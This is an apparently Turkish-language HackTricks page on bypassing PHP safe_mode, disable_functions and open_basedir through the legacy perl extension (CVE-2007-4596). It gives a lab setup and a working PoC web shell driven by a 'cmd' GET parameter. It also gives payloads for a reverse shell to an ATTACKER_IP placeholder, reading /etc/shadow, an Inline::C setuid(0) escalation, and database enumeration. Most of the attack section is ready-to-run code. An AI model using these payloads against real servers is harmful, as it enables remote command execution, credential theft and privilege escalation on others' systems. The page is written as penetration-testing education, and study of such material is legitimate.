PHP Perl Extension Safe_mode Bypass Exploit

Tip

AWS Hacking’i öğrenin ve pratik yapın:HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking’i öğrenin ve pratik yapın: HackTricks Training GCP Red Team Expert (GRTE) Azure Hacking’i öğrenin ve pratik yapın: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks'i Destekleyin

Arka Plan

İzlenen sorun CVE-2007-4596, tam bir Perl yorumlayıcısını gömse de PHP’nin safe_mode, disable_functions veya open_basedir kontrollerine uymayan eski perl PHP eklentisinden kaynaklanır. extension=perl.so yükleyen herhangi bir PHP worker sınırsız Perl eval elde eder, bu yüzden tüm klasik PHP süreç-oluşturma mekanizmaları engellense bile komut yürütme hâlâ basittir. safe_mode PHP 5.4’te ortadan kalkmış olsa da, pek çok güncel olmayan paylaşımlı-hosting yığını ve savunmasız laboratuvar hâlâ bunu içerir; bu nedenle eski kontrol panellerine düştüğünüzde bu bypass hâlâ değerlidir.

2025’te Test Edilebilir Bir Ortam Oluşturma

  • Halka açık olarak son yayımlanan sürüm (perl-1.0.1, January 2013) PHP ≥5.0’ı hedefler. Bunu PECL’den alın, saldırmayı planladığınız PHP dalı için derleyin ve global olarak (php.ini) veya izin veriliyorsa dl() ile yükleyin.
  • Hızlı Debian tabanlı laboratuvar tarifi:
sudo apt install php5.6 php5.6-dev php-pear build-essential
sudo pecl install perl-1.0.1
echo "extension=perl.so" | sudo tee /etc/php/5.6/mods-available/perl.ini
sudo phpenmod perl && sudo systemctl restart apache2
  • Sömürü sırasında kullanılabilirliği var_dump(extension_loaded('perl')); veya print_r(get_loaded_extensions()); ile doğrulayın. Yoksa perl.so’yu arayın veya yazılabilir php.ini/.user.ini girdilerini suistimal ederek zorla yükleyin.
  • Yorumlayıcı PHP worker’ın içinde yaşadığı için harici ikili dosyalara gerek yoktur — ağ çıkış filtreleri veya proc_open kara listeleri önemsizdir.

Orijinal PoC (NetJackal)

From http://blog.safebuff.com/2016/05/06/disable-functions-bypass/, hala eklentinin eval’e yanıt verdiğini doğrulamak için kullanışlı:

<?php
if(!extension_loaded('perl'))die('perl extension is not loaded');
if(!isset($_GET))$_GET=&$HTTP_GET_VARS;
if(empty($_GET['cmd']))$_GET['cmd']=(strtoupper(substr(PHP_OS,0,3))=='WIN')?'dir':'ls';
$perl=new perl();
echo "<textarea rows='25' cols='75'>";
$perl->eval("system('".$_GET['cmd']."')");
echo "&lt;/textarea&gt;";
$_GET['cmd']=htmlspecialchars($_GET['cmd']);
echo "<br><form>CMD: <input type=text name=cmd value='".$_GET['cmd']."' size=25></form>";
?>

Modern Payload İyileştirmeleri

1. TCP Üzerinde Tam TTY

Gömülü yorumlayıcı, /usr/bin/perl engellense bile IO::Socket yükleyebilir:

$perl = new perl();
$payload = <<<'PL'
use IO::Socket::INET;
my $c = IO::Socket::INET->new(PeerHost=>'ATTACKER_IP',PeerPort=>4444,Proto=>'tcp');
open STDIN,  '<&', $c;
open STDOUT, '>&', $c;
open STDERR, '>&', $c;
exec('/bin/sh -i');
PL;
$perl->eval($payload);

2. Dosya Sistemi Kaçışı open_basedir’e Rağmen

Perl, PHP’nin open_basedir ayarını yok sayar, bu yüzden istediğiniz dosyaları okuyabilirsiniz:

$perl = new perl();
$perl->eval('open(F,"/etc/shadow") || die $!; print while <F>; close F;');

IO::Socket::INET veya Net::HTTP üzerinden çıktıyı yönlendirerek PHP tarafından yönetilen descriptors’a dokunmadan verileri exfiltrate edin.

3. Ayrıcalık Yükseltme için Inline Derleme

Eğer Inline::C sistem genelinde mevcutsa, PHP’nin ffi veya pcntl’ine güvenmek yerine isteğin içinde yardımcıları derleyin:

$perl = new perl();
$perl->eval(<<<'PL'
use Inline C => 'DATA';
print escalate();
__DATA__
__C__
char* escalate(){ setuid(0); system("/bin/bash -c 'id; cat /root/flag'"); return ""; }
PL
);

4. Living-off-the-Land Enumeration

Perl’i bir LOLBAS toolkit olarak ele alın—örn., mysqli eksik olsa bile MySQL DSN’lerini dökün:

$perl = new perl();
$perl->eval('use DBI; @dbs = DBI->data_sources("mysql"); print join("\n", @dbs);');

Referanslar

Tip

AWS Hacking’i öğrenin ve pratik yapın:HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking’i öğrenin ve pratik yapın: HackTricks Training GCP Red Team Expert (GRTE) Azure Hacking’i öğrenin ve pratik yapın: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks'i Destekleyin